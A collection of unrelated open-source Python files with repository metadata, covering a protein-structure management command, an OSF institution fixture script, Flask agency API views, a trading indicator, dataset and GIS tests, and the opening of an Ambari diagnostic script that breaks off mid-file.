from structure.models import Structure
from common import definitions
from common.selection import SelectionItem
from common.alignment_gpcr import Alignment
import xlsxwriter, xlrd
from construct.models import *
from construct.functions import *
from construct.tool import *
from residue.models import *
from protein.models import *
import logging, json, os
from collections import OrderedDict
class Command(BaseCommand):
help = "Output all uniprot mappings"
logger = logging.getLogger(__name__)
def handle(self, *args, **options):
for s in Structure.objects.filter(refined=False).all().order_by('protein_conformation__protein__parent__entry_name'):
slug = str(s)
pc = ProteinConformation.objects.filter(protein__entry_name=slug.lower()).get()
rs = pc.residue_set.filter(generic_number__label='34x50')
if not len(rs):
print(slug, pc.protein.parent.entry_name, s.state, s.representative)
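# Illustrative invocation (assuming a standard Django manage.py setup):
#   python manage.py pdbs_with_icl3_helix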
|
cmunk/protwis
|
tools/management/commands/pdbs_with_icl3_helix.py
|
Python
|
apache-2.0
| 1,253
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Populate development database with Institution fixtures."""
import logging
import sys
import urllib
from modularodm import Q
from framework.transactions.context import TokuTransaction
from website import settings
from website.app import init_app
from website.models import Institution, Node
from website.search.search import update_institution, update_node
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
ENVS = ['prod', 'stage', 'stage2', 'test']
SHIBBOLETH_SP_LOGIN = '{}/Shibboleth.sso/Login?entityID={{}}'.format(settings.CAS_SERVER_URL)
SHIBBOLETH_SP_LOGOUT = '{}/Shibboleth.sso/Logout?return={{}}'.format(settings.CAS_SERVER_URL)
def encode_uri_component(val):
return urllib.quote(val, safe='~()*!.\'')
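# e.g. encode_uri_component('urn:mace:incommon:nyu.edu') returns
# 'urn%3Amace%3Aincommon%3Anyu.edu' (':' is not in the safe set above).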
def update_or_create(inst_data):
inst = Institution.load(inst_data['_id'])
if inst:
for key, val in inst_data.iteritems():
setattr(inst.node, inst.attribute_map[key], val)
changed_fields = inst.node.save()
if changed_fields:
print('Updated {}: {}'.format(inst.name, changed_fields))
update_institution(inst)
return inst, False
else:
inst = Institution(None)
inst_data = {inst.attribute_map[k]: v for k, v in inst_data.iteritems()}
new_inst = Node(**inst_data)
new_inst.save()
inst = Institution.load(new_inst.institution_id)
print('Added new institution: {}'.format(new_inst.institution_id))
update_institution(inst)
return new_inst, True
def main(env):
INSTITUTIONS = []
if env == 'prod':
INSTITUTIONS = [
{
'_id': 'busara',
'name': 'Busara Center for Behavioral Economics',
'description': 'The <a href="http://www.busaracenter.org/">Busara Center</a> for Behavioral Economics',
'banner_name': 'busara-banner.png',
'logo_name': 'busara-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['busaracenter.org'],
},
{
'_id': 'cos',
'name': 'Center For Open Science',
'description': 'COS is a non-profit technology company providing free and open services to increase inclusivity and transparency of research. Find out more at <a href="https://cos.io">cos.io</a>.',
'banner_name': 'cos-banner.png',
'logo_name': 'cos-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': ['osf.cos.io'],
'email_domains': ['cos.io'],
},
{
'_id': 'esip',
'name': 'Federation of Earth Science Information Partners (ESIP)',
'description': '<a href="http://www.esipfed.org/">ESIP\'s</a> mission is to support the networking and data dissemination needs of our members and the global Earth science data community by linking the functional sectors of observation, research, application, education and use of Earth science.',
'banner_name': 'esip-banner.png',
'logo_name': 'esip-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['esipfed.org'],
},
{
'_id': 'ljaf',
'name': 'Laura and John Arnold Foundation',
'description': 'Projects listed below are for grants awarded by the Foundation. Please see the <a href="http://www.arnoldfoundation.org/wp-content/uploads/Guidelines-for-Investments-in-Research.pdf">LJAF Guidelines for Investments in Research</a> for more information and requirements.',
'banner_name': 'ljaf-banner.png',
'logo_name': 'ljaf-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['arnoldfoundation.org'],
},
{
'_id': 'nd',
'name': 'University of Notre Dame',
'description': 'In <a href="https://research.nd.edu/news/64035-notre-dame-center-for-open-science-partner-to-advance-open-science-initiatives/">partnership</a> with the <a href="https://crc.nd.edu">Center for Research Computing</a>, <a href="http://esc.nd.edu">Engineering & Science Computing</a>, and the <a href="https://library.nd.edu">Hesburgh Libraries</a>',
'banner_name': 'nd-banner.png',
'logo_name': 'nd-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://login.nd.edu/idp/shibboleth')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://osf.io/goodbye')),
'domains': ['osf.nd.edu'],
'email_domains': [],
},
{
'_id': 'nyu',
'name': 'New York University',
'description': '...',
'banner_name': 'nyu-banner.png',
'logo_name': 'nyu-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:nyu.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://shibboleth.nyu.edu/idp/profile/Logout')),
'domains': ['osf.nyu.edu'],
'email_domains': [],
},
{
'_id': 'ucr',
'name': 'University of California Riverside',
'description': 'Policy prohibits storing PII or HIPAA data on this site, please see C&C\'s <a href="http://cnc.ucr.edu/security/researchers.html">security site</a> for more information.',
'banner_name': 'ucr-banner.png',
'logo_name': 'ucr-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:ucr.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://osf.io/goodbye')),
'domains': ['osf.ucr.edu'],
'email_domains': [],
},
{
'_id': 'ugent',
'name': 'Universiteit Gent',
'description': None,
'banner_name': 'ugent-banner.png',
'logo_name': 'ugent-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://identity.ugent.be/simplesaml/saml2/idp/metadata.php')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://osf.io/goodbye')),
'domains': ['osf.ugent.be'],
'email_domains': [],
},
{
'_id': 'usc',
'name': 'University of Southern California',
'description': 'Projects must abide by <a href="http://policy.usc.edu/info-security/">USC\'s Information Security Policy</a>. Data stored for human subject research repositories must abide by <a href="http://policy.usc.edu/biorepositories/">USC\'s Biorepository Policy</a>. The OSF may not be used for storage of Personal Health Information that is subject to <a href="http://policy.usc.edu/hipaa/">HIPPA regulations</a>.',
'banner_name': 'usc-banner.png',
'logo_name': 'usc-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:usc.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://osf.io/goodbye')),
'domains': ['osf.usc.edu'],
'email_domains': [],
},
{
'_id': 'uva',
'name': 'University of Virginia',
'description': 'Projects must abide by the University <a href="http://www.virginia.edu/informationpolicy/security.html">Security and Data Protection Policies</a>',
'banner_name': 'uva-banner.png',
'logo_name': 'uva-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:virginia.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://osf.io/goodbye')),
'domains': ['osf.virginia.edu'],
'email_domains': [],
},
{
'_id': 'vt',
'name': 'Virginia Tech',
'description': None,
'banner_name': 'vt-banner.png',
'logo_name': 'vt-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:vt.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://osf.io/goodbye')),
'domains': ['osf.vt.edu'],
'email_domains': [],
},
]
if env == 'stage':
INSTITUTIONS = [
{
'_id': 'cos',
'name': 'Center For Open Science [Stage]',
'description': 'Center for Open Science [Stage]',
'banner_name': 'cos-banner.png',
'logo_name': 'cos-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': ['staging-osf.cos.io'],
'email_domains': ['cos.io'],
},
{
'_id': 'nd',
'name': 'University of Notre Dame [Stage]',
'description': 'University of Notre Dame [Stage]',
'banner_name': 'nd-banner.png',
'logo_name': 'nd-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://login-test.cc.nd.edu/idp/shibboleth')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://staging.osf.io/goodbye')),
'domains': ['staging-osf-nd.cos.io'],
'email_domains': [],
},
{
'_id': 'google',
'name': 'Google [Stage]',
'description': 'Google [Stage]',
'banner_name': 'google-banner.png',
'logo_name': 'google-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['gmail.com'],
},
{
'_id': 'yahoo',
'name': 'Yahoo [Stage]',
'description': 'Yahoo [Stage]',
'banner_name': 'yahoo-banner.png',
'logo_name': 'yahoo-shield-rounded-corners.png',
'auth_url': None,
'domains': [],
'email_domains': ['yahoo.com'],
},
]
if env == 'stage2':
INSTITUTIONS = [
{
'_id': 'cos',
'name': 'Center For Open Science [Stage2]',
'description': 'Center for Open Science [Stage2]',
'banner_name': 'cos-banner.png',
'logo_name': 'cos-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': ['staging2-osf.cos.io'],
'email_domains': ['cos.io'],
},
]
elif env == 'test':
INSTITUTIONS = [
{
'_id': 'busara',
'name': 'Busara Center for Behavioral Economics [Test]',
'description': 'The <a href="http://www.busaracenter.org/">Busara Center</a> for Behavioral Economics',
'banner_name': 'busara-banner.png',
'logo_name': 'busara-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['busaracenter.org'],
},
{
'_id': 'cos',
'name': 'Center For Open Science [Test]',
'description': 'COS is a non-profit technology company providing free and open services to increase inclusivity and transparency of research. Find out more at <a href="https://cos.io">cos.io</a>.',
'banner_name': 'cos-banner.png',
'logo_name': 'cos-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': ['test-osf.cos.io'],
'email_domains': ['cos.io'],
},
{
'_id': 'esip',
'name': 'Federation of Earth Science Information Partners (ESIP) [Test]',
'description': '<a href="http://www.esipfed.org/">ESIP\'s</a> mission is to support the networking and data dissemination needs of our members and the global Earth science data community by linking the functional sectors of observation, research, application, education and use of Earth science.',
'banner_name': 'esip-banner.png',
'logo_name': 'esip-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['esipfed.org'],
},
{
'_id': 'ljaf',
'name': 'Laura and John Arnold Foundation [Test]',
'description': 'Projects listed below are for grants awarded by the Foundation. Please see the <a href="http://www.arnoldfoundation.org/wp-content/uploads/Guidelines-for-Investments-in-Research.pdf">LJAF Guidelines for Investments in Research</a> for more information and requirements.',
'banner_name': 'ljaf-banner.png',
'logo_name': 'ljaf-shield-rounded-corners.png',
'auth_url': None,
'logout_url': None,
'domains': [],
'email_domains': ['arnoldfoundation.org'],
},
{
'_id': 'nd',
'name': 'University of Notre Dame [Test]',
'description': 'In <a href="https://research.nd.edu/news/64035-notre-dame-center-for-open-science-partner-to-advance-open-science-initiatives/">partnership</a> with the <a href="https://crc.nd.edu">Center for Research Computing</a>, <a href="http://esc.nd.edu">Engineering & Science Computing</a>, and the <a href="https://library.nd.edu">Hesburgh Libraries</a>',
'banner_name': 'nd-banner.png',
'logo_name': 'nd-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://login-test.cc.nd.edu/idp/shibboleth')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://test.osf.io/goodbye')),
'domains': ['test-osf-nd.cos.io'],
'email_domains': [],
},
{
'_id': 'nyu',
'name': 'New York University [Test]',
'description': 'New York University [Test]',
'banner_name': 'nyu-banner.png',
'logo_name': 'nyu-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://shibbolethqa.es.its.nyu.edu/idp/shibboleth')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://shibbolethqa.es.its.nyu.edu/idp/profile/Logout')),
'domains': ['test-osf-nyu.cos.io'],
'email_domains': [],
},
{
'_id': 'ucr',
'name': 'University of California Riverside [Test]',
'description': 'Policy prohibits storing PII or HIPAA data on this site, please see C&C\'s <a href="http://cnc.ucr.edu/security/researchers.html">security site</a> for more information.',
'banner_name': 'ucr-banner.png',
'logo_name': 'ucr-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:ucr.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://test.osf.io/goodbye')),
'domains': ['test-osf-ucr.cos.io'],
'email_domains': [],
},
{
'_id': 'ugent',
'name': 'Universiteit Gent [Test]',
'description': 'Universiteit Gent [Test]',
'banner_name': 'ugent-banner.png',
'logo_name': 'ugent-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://identity.ugent.be/simplesaml/saml2/idp/metadata.php')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://test.osf.io/goodbye')),
'domains': ['test-osf-ugent.cos.io'],
'email_domains': [],
},
{
'_id': 'usc',
'name': 'University of Southern California [Test]',
'description': 'Projects must abide by <a href="http://policy.usc.edu/info-security/">USC\'s Information Security Policy</a>. Data stored for human subject research repositories must abide by <a href="http://policy.usc.edu/biorepositories/">USC\'s Biorepository Policy</a>. The OSF may not be used for storage of Personal Health Information that is subject to <a href="http://policy.usc.edu/hipaa/">HIPPA regulations</a>.',
'banner_name': 'usc-banner.png',
'logo_name': 'usc-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('urn:mace:incommon:usc.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://test.osf.io/goodbye')),
'domains': ['test-osf-usc.cos.io'],
'email_domains': [],
},
{
'_id': 'uva',
'name': 'University of Virginia [Test]',
'description': 'Projects must abide by the University <a href="http://www.virginia.edu/informationpolicy/security.html">Security and Data Protection Policies</a>',
'banner_name': 'uva-banner.png',
'logo_name': 'uva-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://shibidp-test.its.virginia.edu/idp/shibboleth')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://test.osf.io/goodbye')),
'domains': ['test-osf-virginia.cos.io'],
'email_domains': [],
},
{
'_id': 'vt',
'name': 'Virginia Tech [Test]',
'description': None,
'banner_name': 'vt-banner.png',
'logo_name': 'vt-shield-rounded-corners.png',
'auth_url': SHIBBOLETH_SP_LOGIN.format(encode_uri_component('https://shib-pprd.middleware.vt.edu')),
'logout_url': SHIBBOLETH_SP_LOGOUT.format(encode_uri_component('https://test.osf.io/goodbye')),
'domains': ['osf.vt.edu'],
'email_domains': [],
},
]
init_app(routes=False)
with TokuTransaction():
for inst_data in INSTITUTIONS:
new_inst, inst_created = update_or_create(inst_data)
# update the nodes elastic docs, to have current names of institutions. This will
# only work properly if this file is the only thing changing institution attributes
if not inst_created:
nodes = Node.find_by_institutions(new_inst, query=Q('is_deleted', 'ne', True))
for node in nodes:
update_node(node, async=False)
for extra_inst in Institution.find(Q('_id', 'nin', [x['_id'] for x in INSTITUTIONS])):
logger.warn('Extra Institution : {} - {}'.format(extra_inst._id, extra_inst.name))
if __name__ == '__main__':
env = str(sys.argv[1]).lower() if len(sys.argv) == 2 else None
if env not in ENVS:
        print('An environment must be specified : {}'.format(ENVS))
sys.exit(1)
main(env)
|
samchrisinger/osf.io
|
scripts/populate_institutions.py
|
Python
|
apache-2.0
| 20,582
|
from flask import (
jsonify,
request,
render_template
)
from flask_login import (
current_user,
login_required
)
from app.agency.api import agency_api_blueprint
from app.agency.api.utils import (
get_active_users_as_choices,
get_letter_templates,
get_reasons
)
from app.models import Agencies, CustomRequestForms
import json
from sqlalchemy import asc
@agency_api_blueprint.route('/active_users/<string:agency_ein>', methods=['GET'])
@login_required
def get_active_users(agency_ein):
"""
Retrieve the active users for the specified agency.
:param agency_ein: Agency EIN (String)
:return: JSON Object({"active_users": [('', 'All'), ('o8pj0k', 'John Doe')],
"is_admin": True}), 200
"""
if current_user.is_agency_admin(agency_ein):
return jsonify({"active_users": get_active_users_as_choices(agency_ein), "is_admin": True}), 200
elif current_user.is_agency_active(agency_ein):
active_users = [
('', 'All'),
(current_user.get_id(), 'My Requests')
]
return jsonify({"active_users": active_users, "is_admin": False}), 200
else:
return jsonify({}), 404
@agency_api_blueprint.route('/reasons/<string:agency_ein>', methods=['GET'])
@agency_api_blueprint.route('/reasons/<string:agency_ein>/<string:reason_type>', methods=['GET'])
@login_required
def get_agency_reasons(agency_ein, reason_type=None):
"""Retrieve an agencies determination reasons for Denials, Closings, and Re-Openings
Args:
agency_ein (str): Agency EIN
reason_type (str): One of ("denial", "closing", "re-opening")
All other determination types do not have reasons.
Returns:
JSON Object (dict): Keys are the reason type, values are an array of tuples (id, title)
"""
return jsonify(get_reasons(agency_ein, reason_type))
@agency_api_blueprint.route('/letter_templates/<string:agency_ein>', methods=['GET'])
@agency_api_blueprint.route('/letter_templates/<string:agency_ein>/<string:letter_type>', methods=['GET'])
@login_required
def get_agency_letter_templates(agency_ein, letter_type=None):
"""
    Retrieve letter templates for the specified agency. If a letter type is provided, only templates of
    that type are returned; otherwise all templates are returned.
:param agency_ein: Agency EIN (String)
:param letter_type: One of "acknowledgment", "denial", "closing", "letter", "extension", "re-opening".
:return: JSON Object (keys are template types, values are arrays of tuples (id, name))
"""
return jsonify(get_letter_templates(agency_ein, letter_type))
@agency_api_blueprint.route('/custom_request_forms/<string:agency_ein>', methods=['GET'])
def get_custom_request_form_options(agency_ein):
"""
Retrieve the custom request forms for the specified agency.
:param agency_ein: Agency EIN (String)
:return: JSON Object (keys are the id of the custom request form, values are the names of the forms)
"""
custom_request_forms = CustomRequestForms.query.with_entities(CustomRequestForms.id,
CustomRequestForms.form_name,
CustomRequestForms.repeatable,
CustomRequestForms.category,
CustomRequestForms.minimum_required).filter_by(
agency_ein=agency_ein).order_by(asc(CustomRequestForms.category), asc(CustomRequestForms.id)).all()
return jsonify(custom_request_forms), 200
@agency_api_blueprint.route('/custom_request_form_fields', methods=['GET'])
def get_custom_request_form_fields():
"""
Get the custom request form field definitions based on form id and agency ein
:return: JSON object containing the form field definitions
"""
custom_request_form = CustomRequestForms.query.filter_by(id=request.args['form_id'],
agency_ein=request.args['agency_ein']).one()
repeatable_counter = json.loads(request.args['repeatable_counter'])
instance_id = custom_request_form.repeatable - repeatable_counter[str(custom_request_form.id)] + 1
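    # e.g. (illustrative): a form repeatable 3 times with 2 repetitions still
    # available yields instance_id = 3 - 2 + 1 = 2, i.e. this is the 2nd instance.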
form_template = render_template('custom_request_form_templates/form_description_template.html',
form_description=custom_request_form.form_description)
data = {}
character_counters = {}
popovers = {}
tooltips = {}
error_messages = {}
for field in custom_request_form.field_definitions:
for key, value in field.items():
field_text = key
field_name = value['name']
field_type = value['type']
field_values = value.get('values', None)
field_required = value.get('required', False)
min_length = value.get('min_length', None)
max_length = value.get('max_length', None)
character_counter = value.get('character_counter', None)
placeholder = value.get('placeholder', None)
popover = value.get('popover', None)
tooltip = value.get('tooltip', None)
help_text = value.get('help_text', None)
error_message = value.get('error_message', None)
past_date_invalid = value.get('past_date_invalid', None)
current_date_invalid = value.get('current_date_invalid', None)
future_date_invalid = value.get('future_date_invalid', None)
if character_counter:
character_counter_id = field_name + "-" + str(instance_id)
character_counters[character_counter_id] = {"min_length": min_length,
"max_length": max_length}
if popover:
popover_id = field_name + '-' + str(instance_id)
popovers[popover_id] = popover
if tooltip:
tooltip_id = field_name + '-' + str(instance_id)
tooltips[tooltip_id] = tooltip
if error_message:
error_message_id = field_name + '-' + str(instance_id)
error_messages[error_message_id] = error_message
form_template = form_template + render_template(
'custom_request_form_templates/{}_template.html'.format(field_type), field_text=field_text,
field_name=field_name, options=field_values, field_required=field_required,
min_length=min_length, max_length=max_length, instance_id=instance_id, placeholder=placeholder,
character_counter=character_counter, tooltip=tooltip, help_text=help_text,
past_date_invalid=past_date_invalid, current_date_invalid=current_date_invalid,
future_date_invalid=future_date_invalid) + '\n'
data['form_template'] = form_template
data['character_counters'] = character_counters
data['popovers'] = popovers
data['tooltips'] = tooltips
data['error_messages'] = error_messages
return jsonify(data), 200
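

# Illustrative request for the endpoint above (query-arg names mirror the
# request.args reads in get_custom_request_form_fields; values are hypothetical):
#   GET /custom_request_form_fields?form_id=1&agency_ein=0002&repeatable_counter={"1": 3}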
@agency_api_blueprint.route('/request_types/<string:agency_ein>', methods=['GET'])
def get_request_types(agency_ein):
"""
Retrieve the request types (custom request form names) for the specified agency.
:param agency_ein: Agency EIN (String)
:return: JSON Object({"request_type": [('', 'All'), ('Form Name', 'Form Name')]}), 200
"""
if current_user.is_agency_active(agency_ein):
agency = Agencies.query.filter_by(ein=agency_ein).one_or_none()
if agency is not None and agency.agency_features['custom_request_forms']['enabled']:
request_types = [
(custom_request_form.form_name, custom_request_form.form_name)
for custom_request_form in CustomRequestForms.query.filter_by(
agency_ein=agency_ein
).order_by(asc(CustomRequestForms.category), asc(CustomRequestForms.id)).all()
]
request_types.insert(0, ("", "All"))
return jsonify({"request_types": request_types}), 200
return jsonify({}), 404
|
CityOfNewYork/NYCOpenRecords
|
app/agency/api/views.py
|
Python
|
apache-2.0
| 8,238
|
from . import AbstractIndicator
# Tracker for dynamic indicators.
# Its purpose is tracking min and max values of upstream indicators at the given time slot.
# For static indicators, min and max will have the same value all the time
# (the value at the given time won't change).
class MinMaxTracker(AbstractIndicator):
def __init__(self):
AbstractIndicator.__init__(self)
self.reset()
def reset(self):
        # collection of (min, max) tuples
self.__all_min_max = []
@property
def result(self):
return self.__all_min_max[-1]
@property
def all_result(self):
return self.__all_min_max
def on_new_upstream_value(self, new_value):
if new_value is None:
self.__all_min_max.append(None)
else:
if type(new_value) is list:
self.__update_result(new_value)
else:
raise ValueError("Non-list types are not supported.")
def __update_result(self, input_list):
current_result_index = 0
for input_item in input_list:
# if there's already list with elements
if len(self.__all_min_max) > current_result_index:
current_result = self.__all_min_max[current_result_index]
# None input doesn't change anything in existing elements
if input_item is not None:
if current_result is None:
current_min = current_max = input_item
else:
current_min = min(current_result[0], input_item)
current_max = max(current_result[1], input_item)
self.__all_min_max[current_result_index] = (current_min, current_max)
else:
# if there's no list of elements, we have to create it
if input_item is None:
self.__all_min_max.append(None)
else:
self.__all_min_max.append((input_item, input_item))
current_result_index += 1
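

# Illustrative usage sketch (not part of the original module; values traced
# from __update_result above):
#   tracker = MinMaxTracker()
#   tracker.on_new_upstream_value([3, 7])   # all_result -> [(3, 3), (7, 7)]
#   tracker.on_new_upstream_value([1, 9])   # all_result -> [(1, 3), (7, 9)]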
|
quantwizard-com/pythonbacktest
|
pythonbacktest/indicator/minmaxtracker.py
|
Python
|
apache-2.0
| 2,081
|
# coding=utf-8
# Copyright 2022 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""rlu_locomotion dataset."""
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.rl_unplugged.rlu_locomotion import rlu_locomotion
class RluLocomotionTest(tfds.testing.DatasetBuilderTestCase):
"""Tests for rlu_locomotion dataset."""
DATASET_CLASS = rlu_locomotion.RluLocomotion
SPLITS = {
      'train': 2,  # Number of fake train examples
}
SKIP_TF1_GRAPH_MODE = True
BUILDER_CONFIG_NAMES_TO_TEST = ['humanoid_corridor']
@classmethod
def setUpClass(cls):
rlu_locomotion.RluLocomotion._INPUT_FILE_PREFIX = cls.dummy_data
rlu_locomotion.RluLocomotion._SHARDS = 1
super().setUpClass()
if __name__ == '__main__':
tfds.testing.test_main()
|
tensorflow/datasets
|
tensorflow_datasets/rl_unplugged/rlu_locomotion/rlu_locomotion_test.py
|
Python
|
apache-2.0
| 1,304
|
import math
from synapse.tests.common import *
import synapse.lib.gis as s_gis
# earth mean radius in mm
r = 6371008800
ratios = {
'cm': 10.0,
'm': 1000.0,
'km': 1000000.0,
}
km = 1000000.0 # using mm as base units
gchq = (51.8994, -2.0783)
class GisTest(SynTest):
def test_lib_gis_haversine(self):
px = (36.12, -86.67)
py = (33.94, -118.40)
self.eqish(s_gis.haversine(px, py), 2886448429.7648544)
        # Test haversine value from rosetta code
r = s_gis.haversine((36.12, -86.67), (33.94, -118.40), 6372.8)
e = 2887.2599506071106
self.eqish(r, e)
# Test against 1/4th of a unit sphere
r = s_gis.haversine((45, 45), (-45, 45), 1.0)
e = math.pi / 2
# We are typically within the machine-epsilon range for this test
self.assertAlmostEqual(r, e)
# Test against the haversine package
lyon = (45.7597, 4.8422)
paris = (48.8567, 2.3508)
r = s_gis.haversine(lyon, paris, r=6371)
e = 392.21671780659625
self.assertAlmostEqual(r, e)
def test_lib_gis_latlong(self):
self.assertRaises(ValueError, s_gis.latlong, 'hehe')
self.assertRaises(ValueError, s_gis.latlong, 'hehe,hoho')
self.eq(s_gis.latlong(' 0,0 '), (0.0, 0.0))
self.eq(s_gis.latlong('-0,0 '), (0.0, 0.0))
self.eq(s_gis.latlong('50,100 '), (50.0, 100.0))
self.eq(s_gis.latlong('-50,100 '), (-50.0, 100.0))
self.eq(s_gis.latlong('-50,-100 '), (-50.0, -100.0))
self.eq(s_gis.latlong('50,-100 '), (50.0, -100.0))
self.eq(s_gis.latlong(' 0.12345678901234567890,-0.12345678901234567890 '), (0.12345678901234568, -0.12345678901234568)) # Note precision
        self.eq(s_gis.latlong('123.456,-987.654 '), (123.456, -987.654))  # Note: out-of-range coords are parsed without validation
def test_lib_gis_near(self):
point = (0.0, 0.0)
dist = 0
points = []
self.false(s_gis.near(point, dist, points)) # no points
point = (0.0, 0.0)
dist = 0
points = [(0.0, 0.0)]
self.true(s_gis.near(point, dist, points)) # same point
point = (0.0, 0.0)
dist = 0
points = [(50.0, 50.0), (0.0, 0.0)]
self.true(s_gis.near(point, dist, points)) # far point and same point
point = (45.7597, 4.8422) # lyon
dist = 400000000 # actual haversine distance between lyon/paris is ~392217259mm
points = [(0.0, 0.0), (48.8567, 2.3508)] # 0,0 and paris
self.true(s_gis.near(point, dist, points))
point = (45.7597, 4.8422) # lyon
dist = 391000000 # actual haversine distance between lyon/paris is ~392217259mm
points = [(0.0, 0.0), (48.8567, 2.3508)] # 0,0 and paris
self.false(s_gis.near(point, dist, points))
def test_lib_gis_dms2dec(self):
self.eqish(s_gis.dms2dec(45, 46, 52), 45.78111111111111)
def test_lib_gis_bbox(self):
lbox = s_gis.bbox(gchq[0], gchq[1], 1 * km)
self.eq(lbox, (51.890406796362754,
51.908393203637246,
-2.0928746526154747,
-2.0637253473845254))
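

# For orientation, a minimal reference haversine (a sketch only; the tested
# implementation lives in synapse.lib.gis and is the source of truth for
# units and signature):
def _reference_haversine(px, py, radius=r):
    lat0, lon0 = math.radians(px[0]), math.radians(px[1])
    lat1, lon1 = math.radians(py[0]), math.radians(py[1])
    a = math.sin((lat1 - lat0) / 2) ** 2 + \
        math.cos(lat0) * math.cos(lat1) * math.sin((lon1 - lon0) / 2) ** 2
    return 2 * radius * math.asin(math.sqrt(a))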
|
vivisect/synapse
|
synapse/tests/test_lib_gis.py
|
Python
|
apache-2.0
| 3,170
|
#!/usr/bin/python
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from optparse import OptionParser
from requests.auth import HTTPBasicAuth
from contextlib import closing
import datetime
import errno  # used by FileWriter when guarding against mkdir race conditions
import getpass
import json
import os
import os.path
import requests
import shutil
import subprocess
import sys
import tarfile
import zlib
INDENT_SIZE = 2
class UserPrompt(object):
def __init__(self, prompt):
self.prompt = prompt
def get_hidden(self):
return getpass.getpass(self.prompt)
class FileWriter(object):
def write(self, path, content):
print "Writing config to " + path
if not os.path.exists(os.path.dirname(path)):
try:
os.makedirs(os.path.dirname(path))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
with open(path, 'w') as outfile:
outfile.write(content)
print "...done"
class ShellHandler(object):
def __init__(self):
pass
# returns full stdout of process call
def call(self, command):
try:
return subprocess.call(command)
except OSError as e:
print >> sys.stderr, "Execution failed:", e
# partly hijacked from Python 2.7+ check_output for use in 2.6
def ret_output(self, cmd):
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
output, unused_err = process.communicate()
retcode = process.poll()
if retcode:
raise subprocess.CalledProcessError(retcode, cmd, output=output)
return output
class InfoGatherer(object):
def __init__(self, name):
self.name = name
class AmbariInfo(InfoGatherer):
def __init__(self, host_info, cluster_name):
super(AmbariInfo, self).__init__('Ambari')
self.cluster_name = cluster_name
self.ambari_config_url = 'http://{0}/api/v1/clusters/{1}/configurations/service_config_versions'.format(host_info, cluster_name)
self.params_payload = { 'is_current' : 'true' }
def collect(self, out_dir):
print "Ambari request URL: " + self.ambari_config_url
ambari_user = UserPrompt('Ambari username: ').get_hidden()
